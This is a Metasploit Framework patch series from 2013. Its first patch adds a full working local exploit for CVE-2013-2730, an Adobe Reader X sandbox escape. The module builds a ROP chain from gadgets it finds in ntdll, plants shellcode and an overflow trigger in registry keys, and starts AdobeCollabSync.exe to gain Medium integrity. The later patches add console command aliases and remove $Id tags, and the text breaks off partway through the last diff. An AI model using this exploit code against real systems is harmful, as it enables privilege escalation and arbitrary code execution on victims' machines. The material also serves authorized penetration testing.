From 85ceaa1a622a08b729cd8503efed1001307a4707 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Sat, 18 May 2013 12:44:24 -0500 Subject: [PATCH 1/6] Add module for CVE-2013-2730 --- .../local/adobe_sandbox_adobecollabsync.rb | 364 ++++++++++++++++++ 1 file changed, 364 insertions(+) create mode 100644 modules/exploits/windows/local/adobe_sandbox_adobecollabsync.rb diff --git a/modules/exploits/windows/local/adobe_sandbox_adobecollabsync.rb b/modules/exploits/windows/local/adobe_sandbox_adobecollabsync.rb new file mode 100644 index 0000000000..de33098531 --- /dev/null +++ b/modules/exploits/windows/local/adobe_sandbox_adobecollabsync.rb @@ -0,0 +1,364 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' +require 'rex' +require 'msf/core/post/windows/registry' +require 'msf/core/post/common' +require 'msf/core/post/file' + +class Metasploit3 < Msf::Exploit::Local + Rank = GreatRanking + + include Msf::Exploit::EXE + include Msf::Post::Common + include Msf::Post::File + include Msf::Post::Windows::Registry + + def initialize(info={}) + super(update_info(info, { + 'Name' => 'AdobeCollabSync Buffer Overflow Adobe Reader X Sandbox Bypass', + 'Description' => %q{ + This module exploits a vulnerability on Adobe Reader X Sandbox. The + vulnerability is due to a sandbox rule allowing a Low Integrity AcroRd32.exe + process to write register values which can be used to trigger a buffer overflow on + the AdobeCollabSync component, allowing to achieve Medium Integrity Level + privileges from a Low Integrity AcroRd32.exe process. This module has been tested + successfully on Adobe Reader X 10.1.4 over Windows 7 SP1. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Felipe Andres Manzano', # Vulnerability discovery and PoC + 'juan vazquez' # Metasploit module + ], + 'References' => + [ + [ 'CVE', '2013-2730' ], + [ 'OSVDB', '93355' ], + [ 'URL', 'http://blog.binamuse.com/2013/05/adobe-reader-x-collab-sandbox-bypass.html' ] + ], + 'Arch' => ARCH_X86, + 'Platform' => 'win', + 'SessionTypes' => 'meterpreter', + 'Payload' => + { + 'Space' => 12288, + 'DisableNops' => true + }, + 'Targets' => + [ + [ 'Adobe Reader X 10.1.4 / Windows 7 SP1', + { + 'AdobeCollabSyncTrigger' => 0x18fa0, + 'AdobeCollabSyncTriggerSignature' => "\x56\x68\xBC\x00\x00\x00\xE8\xF5\xFD\xFF\xFF" + } + ], + ], + 'DefaultTarget' => 0, + 'DisclosureDate'=> 'May 14 2013' + })) + + end + + def on_new_session + print_status("Deleting Malicious Registry Keys...") + if not registry_deletekey("HKCU\\Software\\Adobe\\Adobe Synchronizer\\10.0\\DBRecoveryOptions\\shellcode") + print_error("Delete HKCU\\Software\\Adobe\\Adobe Synchronizer\\10.0\\DBRecoveryOptions\\shellcode by yourself") + end + if not registry_deletekey("HKCU\\Software\\Adobe\\Adobe Synchronizer\\10.0\\DBRecoveryOptions\\bDeleteDB") + print_error("Delete HKCU\\Software\\Adobe\\Adobe Synchronizer\\10.0\\DBRecoveryOptions\\bDeleteDB by yourself") + end + print_status("Cleanup finished") + end + + # Test the process integrity level by trying to create a directory on the TEMP folder + # Access should be granted with Medium Integrity Level + # Access should be denied with Low Integrity Level + # Usint this solution atm because I'm experiencing problems with railgun when trying + # use GetTokenInformation + def low_integrity_level? + tmp_dir = expand_path("%TEMP%") + cd(tmp_dir) + new_dir = "#{rand_text_alpha(5)}" + begin + session.shell_command_token("mkdir #{new_dir}") + rescue + return true + end + + if directory?(new_dir) + session.shell_command_token("rmdir #{new_dir}") + return false + else + return true + end + end + + def check_trigger + signature = session.railgun.memread(@addresses['AcroRd32.exe'] + target['AdobeCollabSyncTrigger'], target['AdobeCollabSyncTriggerSignature'].length) + if signature == target['AdobeCollabSyncTriggerSignature'] + return true + end + return false + end + + def collect_addresses + # find the trigger to launch AdobeCollabSyncTrigger.exe from AcroRd32.exe + @addresses['trigger'] = @addresses['AcroRd32.exe'] + target['AdobeCollabSyncTrigger'] + vprint_good("AdobeCollabSyncTrigger trigger address found at 0x#{@addresses['trigger'].to_s(16)}") + + # find kernel32.dll + kernel32 = session.railgun.kernel32.GetModuleHandleA("kernel32.dll") + @addresses['kernel32.dll'] = kernel32["return"] + if @addresses['kernel32.dll'] == 0 + fail_with(Exploit::Failure::Unknown, "Unable to find kernel32.dll") + end + vprint_good("kernel32.dll address found at 0x#{@addresses['kernel32.dll'].to_s(16)}") + + # find kernel32.dll methods + virtual_alloc = session.railgun.kernel32.GetProcAddress(@addresses['kernel32.dll'], "VirtualAlloc") + @addresses['VirtualAlloc'] = virtual_alloc["return"] + if @addresses['VirtualAlloc'] == 0 + fail_with(Exploit::Failure::Unknown, "Unable to find VirtualAlloc") + end + vprint_good("VirtualAlloc address found at 0x#{@addresses['VirtualAlloc'].to_s(16)}") + + reg_get_value = session.railgun.kernel32.GetProcAddress(@addresses['kernel32.dll'], "RegGetValueA") + @addresses['RegGetValueA'] = reg_get_value["return"] + if @addresses['RegGetValueA'] == 0 + fail_with(Exploit::Failure::Unknown, "Unable to find RegGetValueA") + end + vprint_good("RegGetValueA address found at 0x#{@addresses['RegGetValueA'].to_s(16)}") + + # find ntdll.dll + ntdll = session.railgun.kernel32.GetModuleHandleA("ntdll.dll") + @addresses['ntdll.dll'] = ntdll["return"] + if @addresses['ntdll.dll'] == 0 + fail_with(Exploit::Failure::Unknown, "Unable to find ntdll.dll") + end + vprint_good("ntdll.dll address found at 0x#{@addresses['ntdll.dll'].to_s(16)}") + end + + # Search a gadget identified by pattern on the process memory + def search_gadget(base, offset_start, offset_end, pattern) + mem = base + offset_start + length = offset_end - offset_start + mem_contents = session.railgun.memread(mem, length) + return mem_contents.index(pattern) + end + + # Search for gadgets on ntdll.dll + def search_gadgets + ntdll_text_base = 0x10000 + search_length = 0xd6000 + + @gadgets['mov [edi], ecx # ret'] = search_gadget(@addresses['ntdll.dll'], ntdll_text_base, search_length, "\x89\x0f\xc3") + if @gadgets['mov [edi], ecx # ret'].nil? + fail_with(Exploit::Failure::Unknown, "Unable to find gadget 'mov [edi], ecx # ret'") + end + @gadgets['mov [edi], ecx # ret'] += @addresses['ntdll.dll'] + @gadgets['mov [edi], ecx # ret'] += ntdll_text_base + vprint_good("Gadget 'mov [edi], ecx # ret' found at 0x#{@gadgets['mov [edi], ecx # ret'].to_s(16)}") + + @gadgets['ret'] = @gadgets['mov [edi], ecx # ret'] + 2 + vprint_good("Gadget 'ret' found at 0x#{@gadgets['ret'].to_s(16)}") + + @gadgets['pop edi # ret'] = search_gadget(@addresses['ntdll.dll'], ntdll_text_base, search_length, "\x5f\xc3") + if @gadgets['pop edi # ret'].nil? + fail_with(Exploit::Failure::Unknown, "Unable to find gadget 'pop edi # ret'") + end + @gadgets['pop edi # ret'] += @addresses['ntdll.dll'] + @gadgets['pop edi # ret'] += ntdll_text_base + vprint_good("Gadget 'pop edi # ret' found at 0x#{@gadgets['pop edi # ret'].to_s(16)}") + + @gadgets['pop ecx # ret'] = search_gadget(@addresses['ntdll.dll'], ntdll_text_base, search_length, "\x59\xc3") + if @gadgets['pop ecx # ret'].nil? + fail_with(Exploit::Failure::Unknown, "Unable to find gadget 'pop ecx # ret'") + end + @gadgets['pop ecx # ret'] += @addresses['ntdll.dll'] + @gadgets['pop ecx # ret'] += ntdll_text_base + vprint_good("Gadget 'pop edi # ret' found at 0x#{@gadgets['pop ecx # ret'].to_s(16)}") + end + + def create_rop_chain + mem = 0x0c0c0c0c + + buf = [0x58000000 + 1].pack("V") + buf << [0x58000000 + 2].pack("V") + buf << [0].pack("V") + buf << [0x58000000 + 4].pack("V") + + buf << [0x58000000 + 5].pack("V") + buf << [0x58000000 + 6].pack("V") + buf << [0x58000000 + 7].pack("V") + buf << [@gadgets['ret']].pack("V") + buf << rand_text(8) + + # Allocate Memory To store the shellcode and the necessary data to read the + # shellcode stored in the registry + buf << [@addresses['VirtualAlloc']].pack("V") + buf << [@gadgets['ret']].pack("V") + buf << [mem].pack("V") # lpAddress + buf << [0x00010000].pack("V") # SIZE_T dwSize + buf << [0x00003000].pack("V") # DWORD flAllocationType + buf << [0x00000040].pack("V") # flProtect + + # Put in the allocated memory the necessary data in order to read the + # shellcode stored in the registry + # The reg sub key: Software\\Adobe\\Adobe Synchronizer\\10.0\\DBRecoveryOptions + # The reg entry: shellcode + # The output buffer size: 0x3000 + reg_key = "Software\\Adobe\\Adobe Synchronizer\\10.0\\DBRecoveryOptions\x00" + j = 0 + while (j < reg_key.length) + buf << [@gadgets['pop edi # ret']].pack("V") + buf << [mem + j].pack("V") # edi + buf << [@gadgets['pop ecx # ret']].pack("V") + buf << reg_key[j, 4].ljust(4,"\x00") # ecx + buf << [@gadgets['mov [edi], ecx # ret']].pack("V") + j = j + 4 + end + k = j + value_key = "shellcode\x00" + j = 0 + while (j < value_key.length) + buf << [@gadgets['pop edi # ret']].pack("V") + buf << [mem + k + j].pack("V") # edi + buf << [@gadgets['pop ecx # ret']].pack("V") + buf << value_key[j, 4].ljust(4,"\x00") # ecx + buf << [@gadgets['mov [edi], ecx # ret']].pack("V") + j = j + 4 + end + + size_buffer = 0x3000 + buf << [@gadgets['pop edi # ret']].pack("V") + buf << [mem + 0x50].pack("V") # edi + buf << [@gadgets['pop ecx # ret']].pack("V") + buf << [size_buffer].pack("V") # ecx + buf << [@gadgets['mov [edi], ecx # ret']].pack("V") + + # Copy the shellcode from the the registry to the + # memory allocated with executable permissions and + # ret into there + buf << [@addresses['RegGetValueA']].pack("V") + buf << [mem + 0x1000].pack("V") # ret to shellcode + buf << [0x80000001].pack("V") # hkey => HKEY_CURRENT_USER + buf << [mem].pack("V") # lpSubKey + buf << [mem + 0x3c].pack("V") # lpValue + buf << [0x0000FFFF].pack("V") # dwFlags => RRF_RT_ANY + buf << [0].pack("V") # pdwType + buf << [mem + 0x1000].pack("V") # pvData + buf << [mem + 0x50].pack("V") # pcbData + end + + # Store shellcode and AdobeCollabSync.exe Overflow trigger in the Registry + def store_data_registry(buf) + vprint_status("Creating the Registry Key to store the shellcode...") + + if registry_createkey("HKCU\\Software\\Adobe\\Adobe Synchronizer\\10.0\\DBRecoveryOptions\\shellcode") + vprint_good("Registry Key created") + else + fail_with(Exploit::Failure::Unknown, "Failed to create the Registry Key to store the shellcode") + end + + vprint_status("Storing the shellcode in the Registry...") + + if registry_setvaldata("HKCU\\Software\\Adobe\\Adobe Synchronizer\\10.0\\DBRecoveryOptions", "shellcode", payload.encoded, "REG_BINARY") + vprint_good("Shellcode stored") + else + fail_with(Exploit::Failure::Unknown, "Failed to store shellcode in the Registry") + end + + # Create the Malicious registry entry in order to exploit.... + vprint_status("Creating the Registry Key to trigger the Overflow...") + if registry_createkey("HKCU\\Software\\Adobe\\Adobe Synchronizer\\10.0\\DBRecoveryOptions\\bDeleteDB") + vprint_good("Registry Key created") + else + fail_with(Exploit::Failure::Unknown, "Failed to create the Registry Entry to trigger the Overflow") + end + + vprint_status("Storing the trigger in the Registry...") + if registry_setvaldata("HKCU\\Software\\Adobe\\Adobe Synchronizer\\10.0\\DBRecoveryOptions", "bDeleteDB", buf, "REG_BINARY") + vprint_good("Trigger stored") + else + fail_with(Exploit::Failure::Unknown, "Failed to store the trigger in the Registry") + end + end + + def trigger_overflow + vprint_status("Creating the thread to trigger the Overflow on AdobeCollabSync.exe...") + # Create a thread in order to execute the necessary code to launch AdobeCollabSync + ret = session.railgun.kernel32.CreateThread(nil, 0, @addresses['trigger'], nil, "CREATE_SUSPENDED", nil) + if ret['return'] < 1 + print_error("Unable to CreateThread") + return + end + hthread = ret['return'] + + vprint_status("Resuming the Thread...") + # Resume the thread to actually Launch AdobeCollabSync and trigger the vulnerability! + ret = client.railgun.kernel32.ResumeThread(hthread) + if ret['return'] < 1 + fail_with(Exploit::Failure::Unknown, "Unable to ResumeThread") + end + end + + def check + @addresses = {} + acrord32 = session.railgun.kernel32.GetModuleHandleA("AcroRd32.exe") + @addresses['AcroRd32.exe'] = acrord32["return"] + if @addresses['AcroRd32.exe'] == 0 + return Msf::Exploit::CheckCode::Unknown + elsif check_trigger + return Msf::Exploit::CheckCode::Vulnerable + else + return Msf::Exploit::CheckCode::Detected + end + end + + def exploit + @addresses = {} + @gadgets = {} + + print_status("Verifying we're in the correct target process...") + acrord32 = session.railgun.kernel32.GetModuleHandleA("AcroRd32.exe") + @addresses['AcroRd32.exe'] = acrord32["return"] + if @addresses['AcroRd32.exe'] == 0 + fail_with(Exploit::Failure::NoTarget, "AcroRd32.exe process not found") + end + vprint_good("AcroRd32.exe found at 0x#{@addresses['AcroRd32.exe'].to_s(16)}") + + print_status("Checking the AcroRd32.exe image...") + if not check_trigger + fail_with(Exploit::Failure::NoTarget, "Please check the target, the AcroRd32.exe process doesn't match with the target") + end + + print_status("Checking the Process Integrity Level...") + if not low_integrity_level? + fail_with(Exploit::Failure::NoTarget, "Looks like you don't need this Exploit since you're already enjoying Medium Level") + end + + print_status("Collecting necessary addresses for exploit...") + collect_addresses + + print_status("Searching the gadgets needed to build the ROP chain...") + search_gadgets + print_good("Gadgets collected...") + + print_status("Building the ROP chain...") + buf = create_rop_chain + print_good("ROP chain ready...") + + print_status("Storing the shellcode and the trigger in the Registry...") + store_data_registry(buf) + + print_status("Executing AdobeCollabSync.exe...") + trigger_overflow + end +end + From 5e65976089ee0f81064d0ce7a9e988ee5ed3e603 Mon Sep 17 00:00:00 2001 From: James Lee Date: Mon, 20 May 2013 11:20:12 -0500 Subject: [PATCH 2/6] Alias 'run' to 'exploit' Allows console users to use the 'run' command for exploits as well as auxiliary and post, in the same way that 'exploit' works for all three. Saves some typing and makes it do the right thing so users don't have to remember what kind of module they're using. --- lib/msf/ui/console/command_dispatcher/exploit.rb | 12 +++++++++++- 1 file changed, 11 insertions(+), 1 deletion(-) diff --git a/lib/msf/ui/console/command_dispatcher/exploit.rb b/lib/msf/ui/console/command_dispatcher/exploit.rb index f2d536ac17..9c7327002b 100644 --- a/lib/msf/ui/console/command_dispatcher/exploit.rb +++ b/lib/msf/ui/console/command_dispatcher/exploit.rb @@ -33,7 +33,9 @@ class Exploit "exploit" => "Launch an exploit attempt", "rcheck" => "Reloads the module and checks if the target is vulnerable", "rexploit" => "Reloads the module and launches an exploit attempt", - "reload" => "Just reloads the module" + "reload" => "Just reloads the module", + "run" => "Alias for exploit", + "rerun" => "Alias for rexploit", }) end @@ -197,6 +199,8 @@ class Exploit end end + alias cmd_run cmd_exploit + def cmd_exploit_help print_line "Usage: exploit [options]" print_line @@ -204,6 +208,8 @@ class Exploit print @@exploit_opts.usage end + alias cmd_run_help cmd_exploit_help + # # Reloads an exploit module and checks the target to see if it's # vulnerable. @@ -227,6 +233,8 @@ class Exploit end end + alias cmd_rerun cmd_rexploit + def cmd_rexploit_help print_line "Usage: rexploit [options]" print_line @@ -234,6 +242,8 @@ class Exploit print @@exploit_opts.usage end + alias cmd_rerun_help cmd_rexploit_help + # # Picks a reasonable payload and minimally configures it # From f4498c3916cac4fb0606903660cdc104f34edee3 Mon Sep 17 00:00:00 2001 From: James Lee Date: Mon, 20 May 2013 16:21:03 -0500 Subject: [PATCH 3/6] Remove $Id tags Also adds binary coding magic comment to a few files --- lib/msf/base/sessions/command_shell_options.rb | 3 --- lib/msf/base/sessions/meterpreter.rb | 1 - lib/msf/base/sessions/meterpreter_java.rb | 1 - lib/msf/base/sessions/meterpreter_options.rb | 1 - lib/msf/base/sessions/meterpreter_php.rb | 1 - lib/msf/base/sessions/meterpreter_x86_bsd.rb | 1 - lib/msf/base/sessions/meterpreter_x86_linux.rb | 1 - lib/msf/base/sessions/meterpreter_x86_win.rb | 1 - lib/msf/base/sessions/tty.rb | 1 - lib/msf/base/sessions/vncinject_options.rb | 3 --- lib/msf/base/simple/buffer.rb | 1 - lib/msf/base/simple/payload.rb | 1 - lib/msf/core/auxiliary/commandshell.rb | 1 - lib/msf/core/auxiliary/login.rb | 3 --- lib/msf/core/auxiliary/pii.rb | 3 --- lib/msf/core/auxiliary/rservices.rb | 3 --- lib/msf/core/encoded_payload.rb | 1 - lib/msf/core/exploit/browser_autopwn.rb | 1 - lib/msf/core/exploit/cmdstager.rb | 1 - lib/msf/core/exploit/cmdstager_debug_asm.rb | 1 - lib/msf/core/exploit/cmdstager_debug_write.rb | 1 - lib/msf/core/exploit/cmdstager_tftp.rb | 1 - lib/msf/core/exploit/cmdstager_vbs.rb | 1 - lib/msf/core/exploit/cmdstager_vbs_adodb.rb | 1 - lib/msf/core/exploit/dhcp.rb | 1 - lib/msf/core/exploit/egghunter.rb | 1 - lib/msf/core/exploit/exe.rb | 3 --- lib/msf/core/exploit/fmtstr.rb | 1 - lib/msf/core/exploit/ipv6.rb | 3 --- lib/msf/core/exploit/mixins.rb | 1 - lib/msf/core/exploit/mysql.rb | 3 --- lib/msf/core/exploit/omelet.rb | 1 - lib/msf/core/exploit/pdf.rb | 3 --- lib/msf/core/exploit/php_exe.rb | 3 --- lib/msf/core/exploit/riff.rb | 3 --- lib/msf/core/exploit/tcp.rb | 4 +++- lib/msf/core/exploit/telnet.rb | 3 --- lib/msf/core/exploit/tftp.rb | 1 - lib/msf/core/exploit/wbemexec.rb | 3 --- lib/msf/core/payload/generic.rb | 5 +++++ lib/msf/core/payload/windows/exec.rb | 3 --- lib/msf/core/payload/windows/loadlibrary.rb | 3 --- lib/msf/core/rpc/v10/rpc_module.rb | 3 --- lib/msf/ui/console/command_dispatcher/payload.rb | 1 - lib/msf/windows_error.rb | 3 --- lib/rex/elfparsey.rb | 2 -- lib/rex/elfparsey/elf.rb | 2 -- lib/rex/elfparsey/elfbase.rb | 2 -- lib/rex/elfparsey/exceptions.rb | 2 -- lib/rex/elfscan.rb | 2 -- lib/rex/elfscan/scanner.rb | 2 -- lib/rex/elfscan/search.rb | 2 -- lib/rex/exploitation/cmdstager/tftp.rb | 1 - lib/rex/exploitation/jsobfu.rb | 1 - lib/rex/image_source.rb | 2 -- lib/rex/image_source/disk.rb | 2 -- lib/rex/image_source/image_source.rb | 2 -- lib/rex/image_source/memory.rb | 2 -- lib/rex/ole.rb | 4 ---- lib/rex/ole/clsid.rb | 4 ---- lib/rex/ole/difat.rb | 4 ---- lib/rex/ole/directory.rb | 4 ---- lib/rex/ole/direntry.rb | 4 ---- lib/rex/ole/fat.rb | 4 ---- lib/rex/ole/header.rb | 4 ---- lib/rex/ole/minifat.rb | 4 ---- lib/rex/ole/propset.rb | 4 ---- lib/rex/ole/storage.rb | 4 ---- lib/rex/ole/stream.rb | 4 ---- lib/rex/ole/substorage.rb | 4 ---- lib/rex/ole/util.rb | 4 ---- lib/rex/peparsey.rb | 2 -- lib/rex/peparsey/exceptions.rb | 2 -- lib/rex/peparsey/pe.rb | 2 -- lib/rex/peparsey/pe_memdump.rb | 2 -- lib/rex/peparsey/pebase.rb | 2 -- lib/rex/peparsey/section.rb | 2 -- lib/rex/pescan.rb | 2 -- lib/rex/proto/dhcp.rb | 1 - lib/rex/proto/dhcp/constants.rb | 1 - lib/rex/proto/dhcp/server.rb | 1 - lib/rex/proto/ntlm/crypt.rb | 4 ---- lib/rex/proto/ntlm/message.rb | 3 --- lib/rex/proto/rfb.rb | 1 - lib/rex/proto/rfb.rb.ut.rb | 2 -- lib/rex/proto/rfb/cipher.rb | 3 --- lib/rex/proto/rfb/client.rb | 3 --- lib/rex/proto/rfb/constants.rb | 3 --- lib/rex/proto/tftp.rb | 1 - lib/rex/proto/tftp/constants.rb | 1 - lib/rex/proto/tftp/server.rb | 1 - lib/rex/proto/tftp/server.rb.ut.rb | 5 ----- lib/rex/zip/archive.rb | 3 --- lib/rex/zip/blocks.rb | 3 --- lib/rex/zip/entry.rb | 3 --- modules/auxiliary/server/capture/drda.rb | 4 +--- modules/exploits/freebsd/telnet/telnet_encrypt_keyid.rb | 4 +--- modules/exploits/linux/telnet/telnet_encrypt_keyid.rb | 4 +--- .../exploits/multi/http/jboss_deploymentfilerepository.rb | 4 +--- .../windows/browser/novelliprint_getdriversettings.rb | 4 +--- .../exploits/windows/misc/citrix_streamprocess_data_msg.rb | 4 +--- modules/post/windows/gather/credentials/imvu.rb | 4 +--- modules/post/windows/gather/credentials/outlook.rb | 2 +- modules/post/windows/recon/resolve_ip.rb | 4 +--- 104 files changed, 17 insertions(+), 232 deletions(-) diff --git a/lib/msf/base/sessions/command_shell_options.rb b/lib/msf/base/sessions/command_shell_options.rb index 028ce427ab..a170e6f4f5 100644 --- a/lib/msf/base/sessions/command_shell_options.rb +++ b/lib/msf/base/sessions/command_shell_options.rb @@ -1,7 +1,4 @@ # -*- coding: binary -*- -## -# $Id$ -## ## # This file is part of the Metasploit Framework and may be subject to diff --git a/lib/msf/base/sessions/meterpreter.rb b/lib/msf/base/sessions/meterpreter.rb index 2f8b79580a..84b827933d 100644 --- a/lib/msf/base/sessions/meterpreter.rb +++ b/lib/msf/base/sessions/meterpreter.rb @@ -1,5 +1,4 @@ # -*- coding: binary -*- -# $Id$ require 'msf/base' require 'msf/base/sessions/scriptable' diff --git a/lib/msf/base/sessions/meterpreter_java.rb b/lib/msf/base/sessions/meterpreter_java.rb index c92e58e782..2c393c31fd 100644 --- a/lib/msf/base/sessions/meterpreter_java.rb +++ b/lib/msf/base/sessions/meterpreter_java.rb @@ -1,5 +1,4 @@ # -*- coding: binary -*- -# $Id$ require 'msf/base/sessions/meterpreter' diff --git a/lib/msf/base/sessions/meterpreter_options.rb b/lib/msf/base/sessions/meterpreter_options.rb index c44b8c6f5e..16942f0270 100644 --- a/lib/msf/base/sessions/meterpreter_options.rb +++ b/lib/msf/base/sessions/meterpreter_options.rb @@ -1,5 +1,4 @@ # -*- coding: binary -*- -# $Id$ require 'shellwords' diff --git a/lib/msf/base/sessions/meterpreter_php.rb b/lib/msf/base/sessions/meterpreter_php.rb index 2ba47c2c03..98e564567b 100644 --- a/lib/msf/base/sessions/meterpreter_php.rb +++ b/lib/msf/base/sessions/meterpreter_php.rb @@ -1,5 +1,4 @@ # -*- coding: binary -*- -# $Id$ require 'msf/base/sessions/meterpreter' diff --git a/lib/msf/base/sessions/meterpreter_x86_bsd.rb b/lib/msf/base/sessions/meterpreter_x86_bsd.rb index 1f851e270c..d6fb7b27d8 100644 --- a/lib/msf/base/sessions/meterpreter_x86_bsd.rb +++ b/lib/msf/base/sessions/meterpreter_x86_bsd.rb @@ -1,5 +1,4 @@ # -*- coding: binary -*- -# $Id$ require 'msf/base/sessions/meterpreter' diff --git a/lib/msf/base/sessions/meterpreter_x86_linux.rb b/lib/msf/base/sessions/meterpreter_x86_linux.rb index 33e72d1be9..45ba0b910a 100644 --- a/lib/msf/base/sessions/meterpreter_x86_linux.rb +++ b/lib/msf/base/sessions/meterpreter_x86_linux.rb @@ -1,5 +1,4 @@ # -*- coding: binary -*- -# $Id$ require 'msf/base/sessions/meterpreter' diff --git a/lib/msf/base/sessions/meterpreter_x86_win.rb b/lib/msf/base/sessions/meterpreter_x86_win.rb index 2f44f0e640..c3ec8ee2cc 100644 --- a/lib/msf/base/sessions/meterpreter_x86_win.rb +++ b/lib/msf/base/sessions/meterpreter_x86_win.rb @@ -1,5 +1,4 @@ # -*- coding: binary -*- -# $Id$ require 'msf/base/sessions/meterpreter' require 'msf/windows_error' diff --git a/lib/msf/base/sessions/tty.rb b/lib/msf/base/sessions/tty.rb index acaad4629d..400deedc56 100644 --- a/lib/msf/base/sessions/tty.rb +++ b/lib/msf/base/sessions/tty.rb @@ -1,5 +1,4 @@ # -*- coding: binary -*- -# $Id$ require 'msf/base' diff --git a/lib/msf/base/sessions/vncinject_options.rb b/lib/msf/base/sessions/vncinject_options.rb index 1ae2954ceb..80d4930abe 100644 --- a/lib/msf/base/sessions/vncinject_options.rb +++ b/lib/msf/base/sessions/vncinject_options.rb @@ -1,7 +1,4 @@ # -*- coding: binary -*- -## -# $Id$ -## module Msf module Sessions diff --git a/lib/msf/base/simple/buffer.rb b/lib/msf/base/simple/buffer.rb index 3e2b0aff30..7b31207d63 100644 --- a/lib/msf/base/simple/buffer.rb +++ b/lib/msf/base/simple/buffer.rb @@ -1,5 +1,4 @@ # -*- coding: binary -*- -# $Id$ require 'msf/base' diff --git a/lib/msf/base/simple/payload.rb b/lib/msf/base/simple/payload.rb index 59357b1255..7415993b76 100644 --- a/lib/msf/base/simple/payload.rb +++ b/lib/msf/base/simple/payload.rb @@ -1,5 +1,4 @@ # -*- coding: binary -*- -# $Id$ require 'msf/base' diff --git a/lib/msf/core/auxiliary/commandshell.rb b/lib/msf/core/auxiliary/commandshell.rb index ae145c81be..72963b59af 100644 --- a/lib/msf/core/auxiliary/commandshell.rb +++ b/lib/msf/core/auxiliary/commandshell.rb @@ -1,5 +1,4 @@ # -*- coding: binary -*- -# $Id$ require 'msf/base/sessions/command_shell_options' diff --git a/lib/msf/core/auxiliary/login.rb b/lib/msf/core/auxiliary/login.rb index 3072a44907..88012bca00 100644 --- a/lib/msf/core/auxiliary/login.rb +++ b/lib/msf/core/auxiliary/login.rb @@ -1,7 +1,4 @@ # -*- coding: binary -*- -## -# $Id$ -## module Msf diff --git a/lib/msf/core/auxiliary/pii.rb b/lib/msf/core/auxiliary/pii.rb index 3630f08835..9f50b9d17f 100644 --- a/lib/msf/core/auxiliary/pii.rb +++ b/lib/msf/core/auxiliary/pii.rb @@ -1,7 +1,4 @@ # -*- coding: binary -*- -### -# $Id$ -### module Msf diff --git a/lib/msf/core/auxiliary/rservices.rb b/lib/msf/core/auxiliary/rservices.rb index 25671464df..737b3415c6 100644 --- a/lib/msf/core/auxiliary/rservices.rb +++ b/lib/msf/core/auxiliary/rservices.rb @@ -1,7 +1,4 @@ # -*- coding: binary -*- -## -# $Id$ -## ## # diff --git a/lib/msf/core/encoded_payload.rb b/lib/msf/core/encoded_payload.rb index 2cdf6a66a1..afccaab26d 100755 --- a/lib/msf/core/encoded_payload.rb +++ b/lib/msf/core/encoded_payload.rb @@ -1,5 +1,4 @@ # -*- coding: binary -*- -# $Id$ require 'msf/core' diff --git a/lib/msf/core/exploit/browser_autopwn.rb b/lib/msf/core/exploit/browser_autopwn.rb index f4b63f8251..1ee518d714 100644 --- a/lib/msf/core/exploit/browser_autopwn.rb +++ b/lib/msf/core/exploit/browser_autopwn.rb @@ -1,5 +1,4 @@ # -*- coding: binary -*- -# $Id$ # # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/lib/msf/core/exploit/cmdstager.rb b/lib/msf/core/exploit/cmdstager.rb index c99d29064f..4cb43ff7e1 100644 --- a/lib/msf/core/exploit/cmdstager.rb +++ b/lib/msf/core/exploit/cmdstager.rb @@ -1,5 +1,4 @@ # -*- coding: binary -*- -# $Id$ require 'rex/exploitation/cmdstager' require 'msf/core/exploit/exe' diff --git a/lib/msf/core/exploit/cmdstager_debug_asm.rb b/lib/msf/core/exploit/cmdstager_debug_asm.rb index 508307a25d..41b9bd43c8 100644 --- a/lib/msf/core/exploit/cmdstager_debug_asm.rb +++ b/lib/msf/core/exploit/cmdstager_debug_asm.rb @@ -1,5 +1,4 @@ # -*- coding: binary -*- -# $Id$ require 'msf/core/exploit/cmdstager' diff --git a/lib/msf/core/exploit/cmdstager_debug_write.rb b/lib/msf/core/exploit/cmdstager_debug_write.rb index 8b73ac8adf..964a5e8d00 100644 --- a/lib/msf/core/exploit/cmdstager_debug_write.rb +++ b/lib/msf/core/exploit/cmdstager_debug_write.rb @@ -1,5 +1,4 @@ # -*- coding: binary -*- -# $Id$ require 'msf/core/exploit/cmdstager' diff --git a/lib/msf/core/exploit/cmdstager_tftp.rb b/lib/msf/core/exploit/cmdstager_tftp.rb index 5549a687bd..aae3b0bf2b 100644 --- a/lib/msf/core/exploit/cmdstager_tftp.rb +++ b/lib/msf/core/exploit/cmdstager_tftp.rb @@ -1,5 +1,4 @@ # -*- coding: binary -*- -# $Id$ require 'rex/text' require 'msf/core/exploit/tftp' diff --git a/lib/msf/core/exploit/cmdstager_vbs.rb b/lib/msf/core/exploit/cmdstager_vbs.rb index 1247d118a7..05ae9acc74 100644 --- a/lib/msf/core/exploit/cmdstager_vbs.rb +++ b/lib/msf/core/exploit/cmdstager_vbs.rb @@ -1,5 +1,4 @@ # -*- coding: binary -*- -# $Id$ require 'msf/core/exploit/cmdstager' diff --git a/lib/msf/core/exploit/cmdstager_vbs_adodb.rb b/lib/msf/core/exploit/cmdstager_vbs_adodb.rb index b6a082a2a1..3a19611a2e 100644 --- a/lib/msf/core/exploit/cmdstager_vbs_adodb.rb +++ b/lib/msf/core/exploit/cmdstager_vbs_adodb.rb @@ -1,5 +1,4 @@ # -*- coding: binary -*- -# $Id: $ require 'msf/core/exploit/cmdstager' diff --git a/lib/msf/core/exploit/dhcp.rb b/lib/msf/core/exploit/dhcp.rb index 455c204d84..baac9dec9f 100644 --- a/lib/msf/core/exploit/dhcp.rb +++ b/lib/msf/core/exploit/dhcp.rb @@ -1,5 +1,4 @@ # -*- coding: binary -*- -# $Id$ require 'rex/proto/dhcp' diff --git a/lib/msf/core/exploit/egghunter.rb b/lib/msf/core/exploit/egghunter.rb index 31db349cc1..20fc6f0988 100644 --- a/lib/msf/core/exploit/egghunter.rb +++ b/lib/msf/core/exploit/egghunter.rb @@ -1,5 +1,4 @@ # -*- coding: binary -*- -# $Id$ require 'rex/exploitation/egghunter' diff --git a/lib/msf/core/exploit/exe.rb b/lib/msf/core/exploit/exe.rb index e4d632d0ef..49ee94e3e5 100644 --- a/lib/msf/core/exploit/exe.rb +++ b/lib/msf/core/exploit/exe.rb @@ -1,7 +1,4 @@ # -*- coding: binary -*- -## -# $Id$ -## ### # diff --git a/lib/msf/core/exploit/fmtstr.rb 